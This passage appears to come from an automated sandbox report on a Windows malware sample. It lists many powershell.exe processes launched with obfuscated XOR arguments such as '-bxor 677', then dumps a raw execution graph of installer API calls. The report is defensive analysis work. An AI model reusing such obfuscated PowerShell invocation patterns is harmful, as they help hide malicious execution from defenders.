                                              Commandline:powershell.exe 0x6B6570CB -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:79
                                              Start time:09:27:40
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:80
                                              Start time:09:27:41
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656C3197 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:81
                                              Start time:09:27:41
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:82
                                              Start time:09:27:42
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x3A3A51C0 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:83
                                              Start time:09:27:42
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:84
                                              Start time:09:27:44
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x74466BC9 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:85
                                              Start time:09:27:44
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:86
                                              Start time:09:27:45
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x65506DCC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:87
                                              Start time:09:27:45
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:88
                                              Start time:09:27:47
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6E7467D7 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:89
                                              Start time:09:27:47
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:90
                                              Start time:09:27:50
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x28697096 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:91
                                              Start time:09:27:51
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:92
                                              Start time:09:27:53
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:93
                                              Start time:09:27:53
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:94
                                              Start time:09:27:55
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x31343091 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:95
                                              Start time:09:27:55
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:96
                                              Start time:09:27:57
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x202C22CC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:97
                                              Start time:09:27:57
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:98
                                              Start time:09:27:59
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20302ECC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:99
                                              Start time:09:27:59
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:100
                                              Start time:09:28:01
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20302BCC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:101
                                              Start time:09:28:01
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:102
                                              Start time:09:28:03
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2E7230FC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:103
                                              Start time:09:28:03
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:104
                                              Start time:09:28:05
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6B6570CB -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:105
                                              Start time:09:28:05
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:108
                                              Start time:09:28:08
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656C3197 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:109
                                              Start time:09:28:08
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:110
                                              Start time:09:28:09
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x3A3A50C0 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:111
                                              Start time:09:28:09
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:112
                                              Start time:09:28:11
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x616444CC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:113
                                              Start time:09:28:11
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:114
                                              Start time:09:28:12
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6C652ACC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:115
                                              Start time:09:28:13
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:116
                                              Start time:09:28:14
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x72332E85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:117
                                              Start time:09:28:14
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:118
                                              Start time:09:28:16
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x69207094 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:119
                                              Start time:09:28:16
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:120
                                              Start time:09:28:18
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:121
                                              Start time:09:28:18
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:122
                                              Start time:09:28:19
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30783395 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:123
                                              Start time:09:28:19
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:124
                                              Start time:09:28:21
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30303295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Target ID:125
                                              Start time:09:28:21
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Target ID:126
                                              Start time:09:28:23
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C2A6B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                                Execution Graph

                                                Execution Coverage:23.8%
                                                Dynamic/Decrypted Code Coverage:6.2%
                                                Signature Coverage:23.7%
                                                Total number of Nodes:1640
                                                Total number of Limit Nodes:52
4855 405b6c 4 API calls 4854->4855 4855->4856 4857 405eaa SetFilePointer 4856->4857 4858 405cb9 WriteFile 4857->4858 4859 405ec0 GlobalFree 4858->4859 4859->4848 4860->4839 4861->4845 4863 405bad lstrlenA 4862->4863 4864 405b86 lstrcmpiA 4863->4864 4866 405bb5 4863->4866 4865 405ba4 CharNextA 4864->4865 4864->4866 4865->4863 4866->4853 4866->4854 5422 100016b6 5423 100016e5 5422->5423 5424 10001b18 20 API calls 5423->5424 5425 100016ec 5424->5425 5426 100016f3 5425->5426 5427 100016ff 5425->5427 5428 10001272 2 API calls 5426->5428 5429 10001726 5427->5429 5430 10001709 5427->5430 5433 100016fd 5428->5433 5431 10001750 5429->5431 5432 1000172c 5429->5432 5434 1000153d 3 API calls 5430->5434 5436 1000153d 3 API calls 5431->5436 5435 100015b4 3 API calls 5432->5435 5437 1000170e 5434->5437 5438 10001731 5435->5438 5436->5433 5439 100015b4 3 API calls 5437->5439 5440 10001272 2 API calls 5438->5440 5441 10001714 5439->5441 5442 10001737 GlobalFree 5440->5442 5443 10001272 2 API calls 5441->5443 5442->5433 5445 1000174b GlobalFree 5442->5445 5444 1000171a GlobalFree 5443->5444 5444->5433 5445->5433 5446 10002238 5447 10002296 5446->5447 5449 100022cc 5446->5449 5448 100022a8 GlobalAlloc 5447->5448 5447->5449 5448->5447 5450 401cfa GetDlgItem GetClientRect 5451 402bbf 18 API calls 5450->5451 5452 401d2c LoadImageW SendMessageW 5451->5452 5453 401d4a DeleteObject 5452->5453 5454 402a4c 5452->5454 5453->5454 4979 40237b 4980 402381 4979->4980 4981 402bbf 18 API calls 4980->4981 4982 402393 4981->4982 4983 402bbf 18 API calls 4982->4983 4984 40239d RegCreateKeyExW 4983->4984 4985 4023c7 4984->4985 4986 40281e 4984->4986 4987 4023e2 4985->4987 4988 402bbf 18 API calls 4985->4988 4989 4023ee 4987->4989 4991 402ba2 18 API calls 4987->4991 4990 4023d8 lstrlenW 4988->4990 4992 402409 RegSetValueExW 4989->4992 4993 403027 32 API calls 4989->4993 4990->4987 4991->4989 4994 40241f RegCloseKey 4992->4994 4993->4992 4994->4986 5455 4027fb 5456 402bbf 18 API calls 5455->5456 5457 
402802 FindFirstFileW 5456->5457 5458 402815 5457->5458 5459 40282a 5457->5459 5460 402833 5459->5460 5463 405f79 wsprintfW 5459->5463 5464 406032 lstrcpynW 5460->5464 5463->5460 5464->5458 4996 40327d SetErrorMode GetVersion 4997 4032b1 4996->4997 4998 4032b7 4996->4998 5000 406408 5 API calls 4997->5000 4999 40639c 3 API calls 4998->4999 5001 4032ce 4999->5001 5000->4998 5002 40639c 3 API calls 5001->5002 5003 4032d8 5002->5003 5004 40639c 3 API calls 5003->5004 5005 4032e2 5004->5005 5006 406408 5 API calls 5005->5006 5007 4032e9 5006->5007 5008 406408 5 API calls 5007->5008 5009 4032f0 #17 OleInitialize SHGetFileInfoW 5008->5009 5087 406032 lstrcpynW 5009->5087 5011 40332d GetCommandLineW 5088 406032 lstrcpynW 5011->5088 5013 40333f GetModuleHandleW 5014 403357 5013->5014 5015 405a13 CharNextW 5014->5015 5016 403366 CharNextW 5015->5016 5017 403491 GetTempPathW 5016->5017 5027 40337f 5016->5027 5089 40324c 5017->5089 5019 4034a9 5020 403503 DeleteFileW 5019->5020 5021 4034ad GetWindowsDirectoryW lstrcatW 5019->5021 5099 402dee GetTickCount GetModuleFileNameW 5020->5099 5022 40324c 12 API calls 5021->5022 5025 4034c9 5022->5025 5023 405a13 CharNextW 5023->5027 5025->5020 5028 4034cd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 5025->5028 5026 403517 5029 4035ca 5026->5029 5034 4035ba 5026->5034 5038 405a13 CharNextW 5026->5038 5027->5023 5032 40347c 5027->5032 5033 40347a 5027->5033 5031 40324c 12 API calls 5028->5031 5186 4037a1 5029->5186 5036 4034fb 5031->5036 5183 406032 lstrcpynW 5032->5183 5033->5017 5127 40387b 5034->5127 5036->5020 5036->5029 5051 403536 5038->5051 5040 403705 5043 403789 ExitProcess 5040->5043 5044 40370d GetCurrentProcess OpenProcessToken 5040->5044 5041 4035e5 5042 405777 MessageBoxIndirectW 5041->5042 5046 4035f3 ExitProcess 5042->5046 5049 403725 LookupPrivilegeValueW AdjustTokenPrivileges 5044->5049 5050 403759 5044->5050 5047 403594 5052 405aee 18 API calls 5047->5052 5048 4035fb 5053 4056fa 5 API calls 
5048->5053 5049->5050 5054 406408 5 API calls 5050->5054 5051->5047 5051->5048 5055 4035a0 5052->5055 5056 403600 lstrcatW 5053->5056 5057 403760 5054->5057 5055->5029 5184 406032 lstrcpynW 5055->5184 5058 403611 lstrcatW 5056->5058 5059 40361c lstrcatW lstrcmpiW 5056->5059 5060 403775 ExitWindowsEx 5057->5060 5061 403782 5057->5061 5058->5059 5059->5029 5063 403638 5059->5063 5060->5043 5060->5061 5064 40140b 2 API calls 5061->5064 5066 403644 5063->5066 5067 40363d 5063->5067 5064->5043 5065 4035af 5185 406032 lstrcpynW 5065->5185 5070 4056dd 2 API calls 5066->5070 5069 405660 4 API calls 5067->5069 5072 403642 5069->5072 5071 403649 SetCurrentDirectoryW 5070->5071 5073 403664 5071->5073 5074 403659 5071->5074 5072->5071 5194 406032 lstrcpynW 5073->5194 5193 406032 lstrcpynW 5074->5193 5077 406054 18 API calls 5078 4036a3 DeleteFileW 5077->5078 5079 4036b0 CopyFileW 5078->5079 5084 403672 5078->5084 5079->5084 5080 4036f9 5081 405ed3 38 API calls 5080->5081 5081->5029 5082 405ed3 38 API calls 5082->5084 5083 406054 18 API calls 5083->5084 5084->5077 5084->5080 5084->5082 5084->5083 5085 405712 2 API calls 5084->5085 5086 4036e4 CloseHandle 5084->5086 5085->5084 5086->5084 5087->5011 5088->5013 5090 4062c6 5 API calls 5089->5090 5091 403258 5090->5091 5092 403262 5091->5092 5093 4059e6 3 API calls 5091->5093 5092->5019 5094 40326a 5093->5094 5095 4056dd 2 API calls 5094->5095 5096 403270 5095->5096 5097 405c36 2 API calls 5096->5097 5098 40327b 5097->5098 5098->5019 5195 405c07 GetFileAttributesW CreateFileW 5099->5195 5101 402e2e 5102 402e3e 5101->5102 5196 406032 lstrcpynW 5101->5196 5102->5026 5104 402e54 5105 405a32 2 API calls 5104->5105 5106 402e5a 5105->5106 5197 406032 lstrcpynW 5106->5197 5108 402e65 GetFileSize 5123 402f61 5108->5123 5126 402e7c 5108->5126 5110 402f6a 5110->5102 5112 402f9a GlobalAlloc 5110->5112 5210 403235 SetFilePointer 5110->5210 5111 40321f ReadFile 5111->5126 5209 403235 SetFilePointer 5112->5209 5113 402fcd 5117 402d8a 6 API calls 
5113->5117 5116 402fb5 5120 403027 32 API calls 5116->5120 5117->5102 5118 402f83 5119 40321f ReadFile 5118->5119 5122 402f8e 5119->5122 5124 402fc1 5120->5124 5121 402d8a 6 API calls 5121->5126 5122->5102 5122->5112 5198 402d8a 5123->5198 5124->5102 5124->5124 5125 402ffe SetFilePointer 5124->5125 5125->5102 5126->5102 5126->5111 5126->5113 5126->5121 5126->5123 5128 406408 5 API calls 5127->5128 5129 40388f 5128->5129 5130 403895 5129->5130 5131 4038a7 5129->5131 5220 405f79 wsprintfW 5130->5220 5132 405eff 3 API calls 5131->5132 5133 4038d7 5132->5133 5135 4038f6 lstrcatW 5133->5135 5137 405eff 3 API calls 5133->5137 5136 4038a5 5135->5136 5211 403b51 5136->5211 5137->5135 5140 405aee 18 API calls 5141 403928 5140->5141 5142 4039bc 5141->5142 5144 405eff 3 API calls 5141->5144 5143 405aee 18 API calls 5142->5143 5145 4039c2 5143->5145 5147 40395a 5144->5147 5146 4039d2 LoadImageW 5145->5146 5148 406054 18 API calls 5145->5148 5149 403a78 5146->5149 5150 4039f9 RegisterClassW 5146->5150 5147->5142 5151 40397b lstrlenW 5147->5151 5155 405a13 CharNextW 5147->5155 5148->5146 5153 40140b 2 API calls 5149->5153 5152 403a2f SystemParametersInfoW CreateWindowExW 5150->5152 5182 403a82 5150->5182 5156 403989 lstrcmpiW 5151->5156 5157 4039af 5151->5157 5152->5149 5154 403a7e 5153->5154 5161 403b51 19 API calls 5154->5161 5154->5182 5159 403978 5155->5159 5156->5157 5160 403999 GetFileAttributesW 5156->5160 5158 4059e6 3 API calls 5157->5158 5162 4039b5 5158->5162 5159->5151 5163 4039a5 5160->5163 5165 403a8f 5161->5165 5221 406032 lstrcpynW 5162->5221 5163->5157 5164 405a32 2 API calls 5163->5164 5164->5157 5167 403a9b ShowWindow 5165->5167 5168 